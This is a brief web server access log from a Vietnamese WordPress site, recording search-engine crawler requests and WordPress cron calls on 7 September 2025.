217.113.194.74 - - [07/Sep/2025:02:04:02 +0700] "GET /san-pham/tram-lay-mau-bui-tsp-khong-choi-than-3-cap-3/ HTTP/1.0" 200 373640 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:02:04:55 +0700] "POST /wp-cron.php?doing_wp_cron=1757185494.8509130477905273437500 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
217.113.194.75 - - [07/Sep/2025:02:04:53 +0700] "GET /san-pham/tram-lay-mau-bui-tsp-khong-choi-than-3-cap-3/feed/ HTTP/1.0" 200 1714 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.74 - - [07/Sep/2025:02:05:13 +0700] "GET /san-pham/tram-lay-mau-bui-tsp-khong-choi-than-02-cap/feed/ HTTP/1.0" 200 1712 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:02:05:33 +0700] "POST /wp-cron.php?doing_wp_cron=1757185533.4290349483489990234375 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
217.113.194.77 - - [07/Sep/2025:02:05:32 +0700] "GET /san-pham/tram-lay-mau-bui-tsp-khong-choi-than-03-cap/feed/ HTTP/1.0" 200 1713 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
87.250.224.233 - - [07/Sep/2025:02:05:38 +0700] "GET /top-strategies-for-playing-casino-games/ HTTP/1.0" 200 73875 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
213.180.203.222 - - [07/Sep/2025:02:05:41 +0700] "GET /the-hidden-side-unique-stories-from-omegle-and-ometv/ HTTP/1.0" 200 91299 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
